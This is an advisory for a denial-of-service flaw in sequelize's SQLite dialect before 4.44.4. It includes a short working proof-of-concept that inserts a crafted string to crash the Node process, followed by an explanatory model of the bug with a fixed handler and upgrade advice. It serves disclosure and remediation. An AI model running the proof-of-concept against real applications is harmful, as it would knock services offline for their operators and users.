    Severity: moderate

    Denial of Service

    sequelize

    Overview

    Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect does not guard against its results variable being undefined before calling .map on it, and the resulting TypeError is never caught. A value that reaches the database through the SQLite dialect can therefore be crafted to force that exception, and because it is not handled the Node process crashes.

    The following proof-of-concept crashes the Node process when run against an affected version:

    const Sequelize = require('sequelize');

    // Affected: sequelize < 4.44.4 using the SQLite dialect.
    const sequelize = new Sequelize({
        dialect: 'sqlite',
        storage: 'database.sqlite'
    });

    // The original PoC names the model TypeError. That shadows the global
    // TypeError constructor inside this script but is otherwise an ordinary model.
    const TypeError = sequelize.define('TypeError', {
        name: Sequelize.STRING,
    });

    TypeError.sync({force: true}).then(() => {
        // The value is inserted as an escaped string literal, so this is not SQL
        // injection; the crash comes from the dialect's handling of the result
        // set after the write, where results is undefined and .map is called on it.
        return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
    });
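    To make the failure mode concrete without installing sequelize or sqlite3, the following added example (written for this page, not code from sequelize) models the two pieces the advisory describes: a result set that is undefined for non-SELECT statements, and a dialect-side handler that calls .map on it unconditionally. The assumption that the handler decides how to post-process results by looking for the substring sqlite_master in the SQL text, which is how an INSERT carrying the PoC value would reach that code path, is this example's own and is marked in the code; handleResultsFixed shows the guard a patched handler needs.

```javascript
// Added example modelling the advisory's failure mode; not sequelize's code.

// Mimics node-sqlite3's two execution methods: "all" hands back rows for a
// SELECT, "run" (INSERT/UPDATE/...) hands back no row array at all.
// The rows returned for SELECTs are constructed sample data.
function executeSql(sql) {
  const isSelect = sql.trim().toLowerCase().startsWith('select');
  if (isSelect) {
    return [{ name: 'Users' }, { name: 'TypeErrors' }]; // constructed rows
  }
  return undefined; // what a "run" call yields for a write statement
}

// Vulnerable post-processing, modelled on the advisory: it classifies the
// statement by substring-matching the raw SQL text (an assumption of this
// example) and then calls .map on results without checking it exists.
function handleResultsVulnerable(sql, results) {
  if (sql.includes('sqlite_master')) {
    // Treated as a "show tables" style query: reduce rows to their names.
    return results.map(row => row.name); // TypeError if results is undefined
  }
  return results;
}

// Hardened variant: never assume a row array came back.
function handleResultsFixed(sql, results) {
  if (sql.includes('sqlite_master')) {
    return Array.isArray(results) ? results.map(row => row.name) : [];
  }
  return results;
}

// Runs one statement through a handler and reports whether the handler threw,
// instead of letting the exception escape (in the real dialect the uncaught
// TypeError took the whole Node process down).
function runStatement(handler, sql) {
  const results = executeSql(sql);
  try {
    return { ok: true, value: handler(sql, results) };
  } catch (err) {
    return { ok: false, error: err.constructor.name, message: err.message };
  }
}

// The PoC's INSERT as it would look after escaping (constructed): the
// attacker-supplied string is an ordinary literal, yet it carries the
// substring the vulnerable handler keys on.
const POC_INSERT =
  "INSERT INTO `TypeErrors` (`id`,`name`) VALUES (NULL,'SELECT tbl_name FROM sqlite_master');";
const SHOW_TABLES = "SELECT name FROM sqlite_master WHERE type='table';";

console.log(runStatement(handleResultsVulnerable, POC_INSERT)); // ok: false, error: 'TypeError'
console.log(runStatement(handleResultsFixed, POC_INSERT));      // ok: true, value: []
console.log(runStatement(handleResultsFixed, SHOW_TABLES));     // ok: true, value: [ 'Users', 'TypeErrors' ]
```

    The guard on results is what the remediation amounts to. The deeper lesson is that any code path chosen by inspecting the raw SQL string is being steered by data that includes attacker-supplied literals; even with the guard in place, such classification should be driven by the statement type the caller knows, not by substring matches on the final query text.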
    

    Remediation

    Upgrade to version 4.44.4 or later.


    Advisory timeline

    1. reported
       Reported by Francois Gauthier
       Sep 3rd, 2019
    2. published
       Advisory Published
       Jan 22nd, 2020